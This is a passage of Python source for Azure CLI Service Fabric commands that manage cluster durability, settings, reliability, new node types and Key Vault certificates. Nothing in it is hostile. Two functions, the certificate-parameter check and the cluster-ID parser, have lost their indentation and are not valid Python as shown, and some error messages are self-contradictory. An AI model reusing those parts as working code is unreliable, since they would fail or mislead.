    return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_durability(cmd, client, resource_group_name, cluster_name, node_type, durability_level):
    """Align a node type's durability level on both the SFRP cluster model
    and the Service Fabric VMSS extension, updating whichever side differs.

    Raises:
        CLIError: for an unknown node type, or when the Service Fabric VM
            extension is missing from the node type's VMSS.
    """
    cli_ctx = cmd.cli_ctx
    # get cluster node type durability
    cluster = client.get(resource_group_name, cluster_name)
    node_type_refs = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
    if not node_type_refs:
        raise CLIError("Failed to find the node type in the cluster.")
    node_type_ref = node_type_refs[0]
    curr_node_type_durability = node_type_ref.durability_level
    # get vmss extension durability
    compute_client = compute_client_factory(cli_ctx)
    vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type)
    # BUG FIX: _get_sf_vm_extension was called twice with the first result
    # discarded; a single call is kept.
    fabric_ext_ref = _get_sf_vm_extension(vmss)
    if fabric_ext_ref is None:
        raise CLIError("Failed to find service fabric extension.")
    curr_vmss_durability_level = fabric_ext_ref.settings['durabilityLevel']
    # check upgrade: warn when the two sides already disagree
    if curr_node_type_durability.lower() != curr_vmss_durability_level.lower():
        logger.warning(
            "The durability level is currently mismatched between the cluster ('%s') and the VM extension ('%s').",
            curr_node_type_durability,
            curr_vmss_durability_level)
    # update cluster node type durability
    if curr_node_type_durability.lower() != durability_level.lower():
        node_type_ref.durability_level = durability_level
        patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
        update_cluster_poll = client.update(resource_group_name, cluster_name, patch_request)
        LongRunningOperation(cli_ctx)(update_cluster_poll)
    # update vmss sf extension durability
    if curr_vmss_durability_level.lower() != durability_level.lower():
        fabric_ext_ref.settings['durabilityLevel'] = durability_level
        fabric_ext_ref.settings['enableParallelJobs'] = True
        vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(resource_group_name, vmss.name, vmss)
        LongRunningOperation(cli_ctx)(vmss_poll)
    return client.get(resource_group_name, cluster_name)
def update_cluster_upgrade_type(client,
                                resource_group_name,
                                cluster_name,
                                upgrade_mode,
                                version=None):
    """Switch the cluster between 'manual' and 'automatic' code upgrades.

    Manual mode requires an explicit --version, which is pinned as
    cluster_code_version on the patch request.
    """
    mode = upgrade_mode.lower()
    if mode not in ('manual', 'automatic'):
        raise CLIError(
            '--upgrade-mode can either be \'manual\' or \'automatic\'')
    cluster = client.get(resource_group_name, cluster_name)
    patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
    if mode == 'manual':
        if version is None:
            raise CLIError(
                'When \'--upgrade-mode\' set to \'manual\', --version must be given')
        patch_request.cluster_code_version = version
    patch_request.upgrade_mode = upgrade_mode
    return client.update(resource_group_name, cluster_name, patch_request)
def set_cluster_setting(client,
                        resource_group_name,
                        cluster_name,
                        section=None,
                        parameter=None,
                        value=None,
                        settings_section_description=None):
    """Set one fabric setting (--section/--parameter/--value) or several at
    once (--settings-section-description); the two forms are exclusive."""
    def _set(setting_dict, section, parameter, value):
        # Create the section on demand, then write the parameter.
        setting_dict.setdefault(section, {})[parameter] = value
        return setting_dict
    if settings_section_description and (section or parameter or value):
        raise CLIError(
            'Only can use either \'--settings-section-description\' or \'--section\', \'--parameter\' and \'--value\' to set the settings')
    if (section or parameter or value) and (section is None or parameter is None or value is None):
        raise CLIError(
            '\'--section\' , \'--parameter\' and \'--value\' can not be None')
    cluster = client.get(resource_group_name, cluster_name)
    setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
    if settings_section_description:
        for entry in settings_section_description:
            if not ('section' in entry and 'parameter' in entry and 'value' in entry):
                raise CLIError('settings_section_description is invalid')
            setting_dict = _set(setting_dict, entry['section'],
                                entry['parameter'], entry['value'])
    else:
        setting_dict = _set(setting_dict, section, parameter, value)
    settings = _dict_to_fabric_settings(setting_dict)
    patch_request = ClusterUpdateParameters(fabric_settings=settings)
    return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_setting(client,
                           resource_group_name,
                           cluster_name,
                           section=None,
                           parameter=None,
                           settings_section_description=None):
    """Delete one fabric setting (--section/--parameter) or several at once
    (--settings-section-description); the two forms are exclusive."""
    def _remove(setting_dict, section, parameter):
        if section not in setting_dict:
            raise CLIError(
                "Can't find the section {} in the settings".format(section))
        if parameter not in setting_dict[section]:
            raise CLIError(
                "Can't find the parameter {} in the settings".format(parameter))
        del setting_dict[section][parameter]
        return setting_dict
    if settings_section_description and (section or parameter):
        raise CLIError(
            'Only can use either \'--settings-section-description\' or \'--section\' and \'--parameter \' to set the settings')
    cluster = client.get(resource_group_name, cluster_name)
    setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
    if settings_section_description:
        for entry in settings_section_description:
            if not ('section' in entry and 'parameter' in entry):
                raise CLIError('settings_section_description is invalid')
            setting_dict = _remove(setting_dict, entry['section'], entry['parameter'])
    else:
        setting_dict = _remove(setting_dict, section, parameter)
    settings = _dict_to_fabric_settings(setting_dict)
    patch_request = ClusterUpdateParameters(fabric_settings=settings)
    return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_reliability_level(cmd,
                                     client,
                                     resource_group_name,
                                     cluster_name, reliability_level,
                                     auto_add_node=False):
    """Change the cluster's reliability level, growing the primary node
    type's VMSS first when the new level needs more nodes (the scale-up
    must be authorized with --auto_add_node).

    Raises:
        CLIError: when no primary node type exists, or more nodes are
            needed and --auto_add_node was not given.
    """
    cli_ctx = cmd.cli_ctx
    reliability_level = reliability_level.lower()
    cluster = client.get(resource_group_name, cluster_name)
    instance_now = _get_target_instance(cluster.reliability_level)
    instance_target = _get_target_instance(reliability_level)
    node_types = [n for n in cluster.node_types if n.is_primary]
    # BUG FIX: a list comprehension is never None, so the old `is None`
    # check could not fire and a cluster without a primary node type
    # crashed with an IndexError below instead of this CLIError.
    if not node_types:
        raise CLIError("Failed to find the node type in the cluster")
    node_type = node_types[0]
    compute_client = compute_client_factory(cli_ctx)
    vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
    if instance_target == instance_now:
        return cluster
    if instance_target > instance_now:
        if vmss.sku.capacity < instance_target:
            if auto_add_node is not True:
                raise CLIError('Please use --auto_add_node to automatically increase the nodes,{} requires {} nodes, but currenty there are {}'.
                               format(reliability_level, instance_target, vmss.sku.capacity))
            vmss.sku.capacity = instance_target
            vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
                resource_group_name, vmss.name, vmss)
            LongRunningOperation(cli_ctx)(vmss_poll)
            node_type.vm_instance_count = vmss.sku.capacity
    patch_request = ClusterUpdateParameters(
        node_types=cluster.node_types, reliability_level=reliability_level)
    return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node_type(cmd,
                          client,
                          resource_group_name,
                          cluster_name,
                          node_type,
                          capacity,
                          vm_user_name,
                          vm_password,
                          vm_sku=DEFAULT_SKU,
                          vm_tier=DEFAULT_TIER,
                          durability_level=DEFAULT_DURABILITY_LEVEL):
    """Add a new node type to an existing cluster.

    Creates the backing VMSS first, then registers the node type with the
    Service Fabric resource provider, and returns the refreshed cluster.

    :raises CLIError: for an unsupported durability/SKU combination or when
        the node type already exists.
    """
    if durability_level.lower() == 'gold':
        if vm_sku.lower() != 'standard_d15_v2' and vm_sku.lower() != 'standard_g5':
            raise CLIError(
                'Only Standard_D15_v2 and Standard_G5 supports Gold durability, please specify --vm-sku to right value')
    cluster = client.get(resource_group_name, cluster_name)
    # Lower-case BOTH sides: the original only lowered the existing name, so
    # a mixed-case --node-type value could slip past the duplicate check.
    if any(n for n in cluster.node_types if n.name.lower() == node_type.lower()):
        raise CLIError("node type {} already exists in the cluster".format(node_type))
    _create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity)
    _add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type, capacity, durability_level)
    return client.get(resource_group_name, cluster_name)
def _add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type_name, capacity, durability_level):
    """Register the new node type with the Service Fabric resource provider and wait for the update."""
    new_node_type = NodeTypeDescription(name=node_type_name,
                                        client_connection_endpoint_port=DEFAULT_CLIENT_CONNECTION_ENDPOINT,
                                        http_gateway_endpoint_port=DEFAULT_HTTP_GATEWAY_ENDPOINT,
                                        is_primary=False,
                                        vm_instance_count=int(capacity),
                                        durability_level=durability_level,
                                        application_ports=EndpointRangeDescription(
                                            start_port=DEFAULT_APPLICATION_START_PORT, end_port=DEFAULT_APPLICATION_END_PORT),
                                        ephemeral_ports=EndpointRangeDescription(
                                            start_port=DEFAULT_EPHEMERAL_START, end_port=DEFAULT_EPHEMERAL_END))
    cluster.node_types.append(new_node_type)
    update_request = ClusterUpdateParameters(node_types=cluster.node_types)
    pending = client.update(resource_group_name, cluster_name, update_request)
    LongRunningOperation(cmd.cli_ctx)(pending)
def _create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type_name, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity):
    """Provision the VM scale set backing a new Service Fabric node type.

    Creates, in order: a free subnet in the cluster's virtual network, a
    public IP and load balancer (TCP + HTTP rules, probes, NAT pool), VHD
    storage accounts, and finally the scale set itself.  Extension and
    secret configuration is cloned from the VMSS of the cluster's first
    node type.
    """
    cli_ctx = cmd.cli_ctx
    subnet_name = "subnet_{}".format(1)
    network_client = network_client_factory(cli_ctx)
    location = _get_resource_group_by_name(cli_ctx, resource_group_name).location
    virtual_network = list(
        network_client.virtual_networks.list(resource_group_name))[0]
    subnets = list(network_client.subnets.list(
        resource_group_name, virtual_network.name))
    address_prefix = None
    index = None
    # Pick the first unused 10.0.x.0/24 prefix; also bump subnet_name while
    # scanning if a subnet with the current candidate name already exists.
    for x in range(1, 255):
        address_prefix = '10.0.{}.0/24'.format(x)
        index = x
        found = False
        for s in subnets:
            if address_prefix == s.address_prefix:
                found = True
            if subnet_name.lower() == s.name.lower():
                subnet_name = "subnet_{}".format(x)
        if found is False:
            break
    if address_prefix is None:
        raise CLIError("Failed to generate the address prefix")
    poller = network_client.subnets.begin_create_or_update(resource_group_name,
                                                           virtual_network.name,
                                                           subnet_name,
                                                           Subnet(address_prefix=address_prefix))
    subnet = LongRunningOperation(cli_ctx)(poller)
    # Public IP / DNS / load-balancer names derived from cluster + node type.
    public_address_name = 'LBIP-{}-{}{}'.format(
        cluster_name.lower(), node_type_name.lower(), index)
    dns_label = '{}-{}{}'.format(cluster_name.lower(),
                                 node_type_name.lower(), index)
    lb_name = 'LB-{}-{}{}'.format(cluster_name.lower(),
                                  node_type_name.lower(), index)
    if len(lb_name) >= 24:
        # Respect the resource-name length limit but keep the index suffix.
        lb_name = '{}{}'.format(lb_name[0:21], index)
    poller = network_client.public_ip_addresses.begin_create_or_update(resource_group_name,
                                                                       public_address_name,
                                                                       PublicIPAddress(public_ip_allocation_method='Dynamic',
                                                                                       location=location,
                                                                                       dns_settings=PublicIPAddressDnsSettings(domain_name_label=dns_label)))
    publicIp = LongRunningOperation(cli_ctx)(poller)
    from azure.cli.core.commands.client_factory import get_subscription_id
    subscription_id = get_subscription_id(cli_ctx)
    new_load_balancer_id = '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}'.format(
        subscription_id, resource_group_name, lb_name)
    backend_address_poll_name = "LoadBalancerBEAddressPool"
    frontendip_configuration_name = "LoadBalancerIPConfig"
    probe_name = "FabricGatewayProbe"
    probe_http_name = "FabricHttpGatewayProbe"
    inbound_nat_pools_name = "LoadBalancerBEAddressNatPool"
    # One TCP rule (client connection endpoint) and one HTTP rule (gateway),
    # each with its own probe, plus an inbound NAT pool.
    new_load_balancer = LoadBalancer(
        id=new_load_balancer_id,
        location=location,
        frontend_ip_configurations=[FrontendIPConfiguration(name=frontendip_configuration_name,
                                                            public_ip_address=PublicIPAddress(id=publicIp.id))],
        backend_address_pools=[BackendAddressPool(
            name=backend_address_poll_name)],
        load_balancing_rules=[
            LoadBalancingRule(name='LBRule',
                              backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.
                                                                      format(subscription_id,
                                                                             resource_group_name,
                                                                             lb_name,
                                                                             backend_address_poll_name)),
                              backend_port=DEFAULT_TCP_PORT,
                              enable_floating_ip=False,
                              frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
                                                                                                                                                                                                   resource_group_name,
                                                                                                                                                                                                   lb_name,
                                                                                                                                                                                                   frontendip_configuration_name)),
                              frontend_port=DEFAULT_TCP_PORT,
                              idle_timeout_in_minutes=5,
                              protocol='tcp',
                              probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
                                                                                                                                                             resource_group_name,
                                                                                                                                                             lb_name,
                                                                                                                                                             probe_name))),
            LoadBalancingRule(name='LBHttpRule',
                              backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.format(subscription_id,
                                                                                                                                                                                         resource_group_name,
                                                                                                                                                                                         lb_name,
                                                                                                                                                                                         backend_address_poll_name)),
                              backend_port=DEFAULT_HTTP_PORT,
                              enable_floating_ip=False,
                              frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
                                                                                                                                                                                                   resource_group_name,
                                                                                                                                                                                                   lb_name,
                                                                                                                                                                                                   frontendip_configuration_name)),
                              frontend_port=DEFAULT_HTTP_PORT,
                              idle_timeout_in_minutes=5,
                              protocol='tcp',
                              probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
                                                                                                                                                             resource_group_name,
                                                                                                                                                             lb_name,
                                                                                                                                                             probe_http_name)))],
        probes=[Probe(protocol='tcp',
                      name=probe_name,
                      interval_in_seconds=5,
                      number_of_probes=2,
                      port=DEFAULT_TCP_PORT),
                Probe(protocol='tcp',
                      name=probe_http_name,
                      interval_in_seconds=5,
                      number_of_probes=2,
                      port=DEFAULT_HTTP_PORT)],
        inbound_nat_pools=[InboundNatPool(protocol='tcp',
                                          name=inbound_nat_pools_name,
                                          backend_port=DEFAULT_BACKEND_PORT,
                                          frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
                                                                                                                                                                                                               resource_group_name,
                                                                                                                                                                                                               lb_name,
                                                                                                                                                                                                               frontendip_configuration_name)),
                                          frontend_port_range_start=DEFAULT_FRONTEND_PORT_RANGE_START,
                                          frontend_port_range_end=DEFAULT_FRONTEND_PORT_RANGE_END)])
    poller = network_client.load_balancers.begin_create_or_update(
        resource_group_name, lb_name, new_load_balancer)
    LongRunningOperation(cli_ctx)(poller)
    # Re-fetch so the pool/NAT sub-resources have server-assigned ids.
    new_load_balancer = network_client.load_balancers.get(
        resource_group_name, lb_name)
    backend_address_pools = []
    inbound_nat_pools = []
    for p in new_load_balancer.backend_address_pools:
        backend_address_pools.append(SubResource(id=p.id))
    for p in new_load_balancer.inbound_nat_pools:
        inbound_nat_pools.append(SubResource(id=p.id))
    network_config_name = 'NIC-{}-{}'.format(node_type_name.lower(), node_type_name.lower())
    if len(network_config_name) >= 24:
        network_config_name = network_config_name[0:22]
    ip_config_name = 'Nic-{}'.format(node_type_name.lower())
    if len(ip_config_name) >= 24:
        # NOTE(review): this truncates network_config_name rather than
        # ip_config_name -- looks like a copy/paste slip; confirm intent.
        ip_config_name = network_config_name[0:22]
    vm_network_profile = VirtualMachineScaleSetNetworkProfile(
        network_interface_configurations=[VirtualMachineScaleSetNetworkConfiguration(
            name=network_config_name,
            primary=True,
            ip_configurations=[VirtualMachineScaleSetIPConfiguration(name=ip_config_name,
                                                                     load_balancer_backend_address_pools=backend_address_pools,
                                                                     load_balancer_inbound_nat_pools=inbound_nat_pools,
                                                                     subnet=ApiEntityReference(id=subnet.id))])])
    compute_client = compute_client_factory(cli_ctx)
    # Clone configuration from the VMSS backing the cluster's first node type.
    node_type_name_ref = cluster.node_types[0].name
    vmss_reference = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type_name_ref)

    def create_vhd(cli_ctx, resource_group_name, cluster_name, node_type, location):
        """Create five storage accounts and return their blob 'vhd' container URIs."""
        storage_name = '{}{}'.format(cluster_name.lower(), node_type.lower())
        name = ""
        vhds = []
        # Storage account names must be alphanumeric; keep at most 21 chars
        # so the 1..5 index suffix still fits.
        for n in storage_name:
            if n.isalpha() or n.isdigit():
                name += n
            if len(name) >= 21:
                break
        for i in range(1, 6):
            acc = create_storage_account(
                cli_ctx, resource_group_name.lower(), '{}{}'.format(name, i), location)
            vhds.append('{}{}'.format(acc[0].primary_endpoints.blob, 'vhd'))
        return vhds

    def create_storage_account(cli_ctx, resource_group_name, storage_name, location):
        """Create a Standard_LRS storage account; return (properties, keys)."""
        from azure.mgmt.storage.models import Sku, SkuName
        storage_client = storage_client_factory(cli_ctx)
        LongRunningOperation(cli_ctx)(storage_client.storage_accounts.create(resource_group_name,
                                                                             storage_name,
                                                                             StorageAccountCreateParameters(sku=Sku(name=SkuName.standard_lrs),
                                                                                                            kind='storage',
                                                                                                            location=location)))
        acc_prop = storage_client.storage_accounts.get_properties(
            resource_group_name, storage_name)
        acc_keys = storage_client.storage_accounts.list_keys(
            resource_group_name, storage_name)
        return acc_prop, acc_keys

    # Image reference: Windows Server by default, Ubuntu for Linux clusters.
    publisher = 'MicrosoftWindowsServer'
    offer = 'WindowsServer'
    version = 'latest'
    sku = os_dic[DEFAULT_OS]
    if cluster.vm_image.lower() == 'linux':
        publisher = 'Canonical'
        offer = 'UbuntuServer'
        version = 'latest'
        sku = os_dic['UbuntuServer1604']
    storage_profile = VirtualMachineScaleSetStorageProfile(
        image_reference=ImageReference(publisher=publisher,
                                       offer=offer,
                                       sku=sku,
                                       version=version),
        os_disk=VirtualMachineScaleSetOSDisk(caching='ReadOnly',
                                             create_option='FromImage',
                                             name='vmssosdisk',
                                             vhd_containers=create_vhd(cli_ctx, resource_group_name, cluster_name, node_type_name, location)))
    os_profile = VirtualMachineScaleSetOSProfile(computer_name_prefix=node_type_name,
                                                 admin_password=vm_password,
                                                 admin_username=vm_user_name,
                                                 secrets=vmss_reference.virtual_machine_profile.os_profile.secrets)
    diagnostics_storage_name = cluster.diagnostics_storage_account_config.storage_account_name
    diagnostics_ext = None
    fabric_ext = None
    # Clone the IaaSDiagnostics extension (if present) and rebuild its
    # protected settings with freshly fetched storage keys.
    diagnostics_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
    ) == 'IaaSDiagnostics'.lower()]
    if any(diagnostics_exts):
        diagnostics_ext = diagnostics_exts[0]
        diagnostics_account = diagnostics_ext.settings['StorageAccount']
        storage_client = storage_client_factory(cli_ctx)
        list_results = storage_client.storage_accounts.list_keys(
            resource_group_name, diagnostics_account)
        import json
        json_data = json.loads(
            '{"storageAccountName": "", "storageAccountKey": "", "storageAccountEndPoint": ""}')
        json_data['storageAccountName'] = diagnostics_account
        json_data['storageAccountKey'] = list_results.keys[0].value
        json_data['storageAccountEndPoint'] = "https://core.windows.net/"
        diagnostics_ext.protected_settings = json_data
    # Clone the Service Fabric node extension and retarget it at the new
    # node type; keep the subnet prefix override if one was not already set.
    fabric_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
    ) == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type1.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
    if any(fabric_exts):
        fabric_ext = fabric_exts[0]
    if fabric_ext is None:
        raise CLIError("No valid fabric extension found")
    fabric_ext.settings['nodeTypeRef'] = node_type_name
    fabric_ext.settings['durabilityLevel'] = durability_level
    if 'nicPrefixOverride' not in fabric_ext.settings:
        fabric_ext.settings['nicPrefixOverride'] = address_prefix
    storage_client = storage_client_factory(cli_ctx)
    list_results = storage_client.storage_accounts.list_keys(
        resource_group_name, diagnostics_storage_name)
    import json
    json_data = json.loads(
        '{"StorageAccountKey1": "", "StorageAccountKey2": ""}')
    fabric_ext.protected_settings = json_data
    fabric_ext.protected_settings['StorageAccountKey1'] = list_results.keys[0].value
    fabric_ext.protected_settings['StorageAccountKey2'] = list_results.keys[1].value
    extensions = [fabric_ext]
    if diagnostics_ext:
        extensions.append(diagnostics_ext)
    vm_ext_profile = VirtualMachineScaleSetExtensionProfile(
        extensions=extensions)
    virtual_machine_scale_set_profile = VirtualMachineScaleSetVMProfile(extension_profile=vm_ext_profile,
                                                                        os_profile=os_profile,
                                                                        storage_profile=storage_profile,
                                                                        network_profile=vm_network_profile)
    poller = compute_client.virtual_machine_scale_sets.begin_create_or_update(resource_group_name,
                                                                              node_type_name,
                                                                              VirtualMachineScaleSet(location=location,
                                                                                                     sku=ComputeSku(name=vm_sku, tier=vm_tier, capacity=capacity),
                                                                                                     overprovision=False,
                                                                                                     upgrade_policy=UpgradePolicy(mode=UpgradeMode.automatic),
                                                                                                     virtual_machine_profile=virtual_machine_scale_set_profile))
    LongRunningOperation(cli_ctx)(poller)
def _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster_id, node_type_name):
    """Locate the scale set backing *node_type_name* of the given cluster, or raise CLIError."""
    for candidate in compute_client.virtual_machine_scale_sets.list(resource_group_name):
        ext = _get_sf_vm_extension(candidate)
        if ext is None:
            continue
        same_cluster = _get_cluster_id_in_sf_extension(ext).lower() == cluster_id.lower()
        same_node_type = ext.settings["nodeTypeRef"].lower() == node_type_name.lower()
        if same_cluster and same_node_type:
            return candidate
    raise CLIError("Failed to find vmss in resource group {} for cluster id {} and node type {}".format(resource_group_name, cluster_id, node_type_name))
def _verify_cert_function_parameter(certificate_file=None,
certificate_password=None,
vault_name=None, # pylint: disable=unused-argument
vault_resource_group_name=None, # pylint: disable=unused-argument
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
if certificate_file:
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--certificate-file\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--certificate-file\' is present')
else:
if secret_identifier:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if certificate_password:
raise CLIError(
'\'--certificate-password\' is ingored if \'--secret-identifier\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--secret-identifier\' is present')
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--secret-identifier\' is present')
else:
if certificate_subject_name:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if secret_identifier:
raise CLIError(
'\'--secret-identifier\' is ingored if \'--secret-identifier\' is present')
else:
raise CLIError("Invalid input")
def _create_certificate(cmd,
                        cli_ctx,
                        resource_group_name,
                        certificate_file=None,
                        certificate_password=None,
                        vault_name=None,
                        vault_resource_group_name=None,
                        certificate_output_folder=None,
                        certificate_subject_name=None,
                        secret_identifier=None):
    """Resolve or create the cluster certificate.

    Three mutually-exclusive sources (validated up front):
      * secret_identifier        -- reuse an existing key-vault secret;
      * certificate_file         -- import a local file into a vault;
      * certificate_subject_name -- create a self-signed certificate.

    Returns (vault_id, secret_url, certificate_thumbprint, output_file);
    output_file is only set on the self-signed path when
    certificate_output_folder is given.
    """
    _verify_cert_function_parameter(certificate_file, certificate_password,
                                    vault_name, vault_resource_group_name,
                                    certificate_output_folder,
                                    certificate_subject_name,
                                    secret_identifier)
    output_file = None
    rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
    location = rg.location
    vault_id = None
    secret_url = None
    certificate_thumbprint = None
    VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
    # NOTE(review): copies the SDK model docstring onto the helper at call
    # time -- presumably for CLI help generation; confirm before removing.
    _create_keyvault.__doc__ = VaultProperties.__doc__
    if secret_identifier is not None:
        # Reuse an existing secret: resolve its vault and thumbprint only.
        vault = _get_vault_from_secret_identifier(cli_ctx, secret_identifier)
        vault_id = vault.id
        certificate_thumbprint = _get_thumbprint_from_secret_identifier(
            cli_ctx, vault, secret_identifier)
        secret_url = secret_identifier
    else:
        # Default the vault resource group / vault name from the cluster's
        # resource group when not supplied.
        if vault_resource_group_name is None:
            logger.info("vault_resource_group_name not set, using %s.", resource_group_name)
            vault_resource_group_name = resource_group_name
        if vault_name is None:
            logger.info("vault_name not set using '%s' as vault name.", vault_resource_group_name)
            vault_name = vault_resource_group_name
        vault = _safe_get_vault(cli_ctx, vault_resource_group_name, vault_name)
        if certificate_file is not None:
            # Import a local .pem/.pfx into the (possibly newly created) vault.
            if vault is None:
                logger.info("Creating key vault")
                vault = _create_keyvault(
                    cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
            vault_uri = vault.properties.vault_uri
            certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
            logger.info("Import certificate")
            result = import_certificate(
                cli_ctx, vault_uri, certificate_name, certificate_file, password=certificate_password)
            vault_id = vault.id
            secret_url = result.sid
            import base64
            certificate_thumbprint = b64_to_hex(
                base64.b64encode(result.x509_thumbprint))
        else:
            # Create a self-signed certificate in the (possibly new) vault.
            if vault is None:
                logger.info("Creating key vault")
                # Older keyvault management API versions return the vault
                # directly instead of a poller.
                if cmd.supported_api_version(resource_type=ResourceType.MGMT_KEYVAULT, min_api='2018-02-14'):
                    vault = _create_keyvault(
                        cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
                else:
                    vault = _create_keyvault(
                        cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
                logger.info("Wait for key vault ready")
                time.sleep(20)
            vault_uri = vault.properties.vault_uri
            certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
            policy = _get_default_policy(cli_ctx, certificate_subject_name)
            logger.info("Creating self-signed certificate")
            # NOTE(review): docstring copied from the data-plane client at
            # call time, same pattern as _create_keyvault above.
            _create_self_signed_key_vault_certificate.__doc__ = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'key_vault_client#KeyVaultClient').__doc__
            result = _create_self_signed_key_vault_certificate(
                cli_ctx, vault_uri, certificate_name, policy, certificate_output_folder=certificate_output_folder)
            kv_result = result[0]
            output_file = result[1]
            vault_id = vault.id
            secret_url = kv_result.sid
            import base64
            certificate_thumbprint = b64_to_hex(
                base64.b64encode(kv_result.x509_thumbprint))
    return vault_id, secret_url, certificate_thumbprint, output_file
# pylint: disable=inconsistent-return-statements
def _add_cert_to_vmss(cli_ctx, vmss, resource_group_name, vault_id, secret_url):
    """Ensure the key-vault certificate is installed on the given VMSS.

    Adds the vault/certificate to the OS profile secrets when missing and
    pushes the scale-set update; returns early (None) when the certificate
    is already present.
    """
    compute_client = compute_client_factory(cli_ctx)
    secrets = [
        s for s in vmss.virtual_machine_profile.os_profile.secrets if s.source_vault.id == vault_id]
    # A list comprehension always yields a list, so the original
    # 'is None' half of this check was dead.
    if not secrets:
        if vmss.virtual_machine_profile.os_profile.secrets is None:
            vmss.virtual_machine_profile.os_profile.secrets = []
        new_vault_certificates = [VaultCertificate(certificate_url=secret_url, certificate_store='my')]
        new_source_vault = SubResource(id=vault_id)
        vmss.virtual_machine_profile.os_profile.secrets.append(VaultSecretGroup(source_vault=new_source_vault,
                                                                                vault_certificates=new_vault_certificates))
    else:
        if secrets[0].vault_certificates is not None:
            certs = [
                c for c in secrets[0].vault_certificates if c.certificate_url == secret_url]
            if not certs:
                secrets[0].vault_certificates.append(
                    VaultCertificate(certificate_url=secret_url, certificate_store='my'))
            else:
                # Certificate already installed; nothing to update.
                return
        else:
            secrets[0].vault_certificates = []
            # Keyword arguments for consistency with the constructions above
            # (the original passed these positionally).
            secrets[0].vault_certificates.append(
                VaultCertificate(certificate_url=secret_url, certificate_store='my'))
    poller = compute_client.virtual_machine_scale_sets.begin_create_or_update(
        resource_group_name, vmss.name, vmss)
    return LongRunningOperation(cli_ctx)(poller)
def _get_sf_vm_extension(vmss):
    """Return the Service Fabric node extension of *vmss*, or None if absent.

    Handles both SDK model shapes: older models expose the extension type
    as 'type1', newer ones as 'type_properties_type'.
    """
    for ext in vmss.virtual_machine_profile.extension_profile.extensions:
        extension_type = None
        if hasattr(ext, 'type1') and ext.type1 is not None:
            extension_type = ext.type1.lower()
        elif hasattr(ext, 'type_properties_type') and ext.type_properties_type is not None:
            extension_type = ext.type_properties_type.lower()
        if extension_type is not None and extension_type in (SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME, SERVICE_FABRIC_LINUX_NODE_EXT_NAME):
            # Return the match directly; the original's trailing
            # 'fabric_ext == []' comparison was dead code (the loop variable
            # is a model object, never a list).
            return ext
    return None
def _get_cluster_id_in_sf_extension(fabric_ext):
cluster_endpoint = fabric_ext.settings["clusterEndpoint"]
endpoint_list = cluster_endpoint.split('/')
cluster_id = endpoint_list[len(endpoint_list) - 1]
return cluster_id
def _add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster_id, vault_id, secret_url, is_cluster_cert=False, thumbprint=None):
    """Install a key-vault certificate on every VMSS belonging to the cluster.

    When is_cluster_cert is True the certificate is also registered as the
    secondary cluster certificate in each Service Fabric extension's
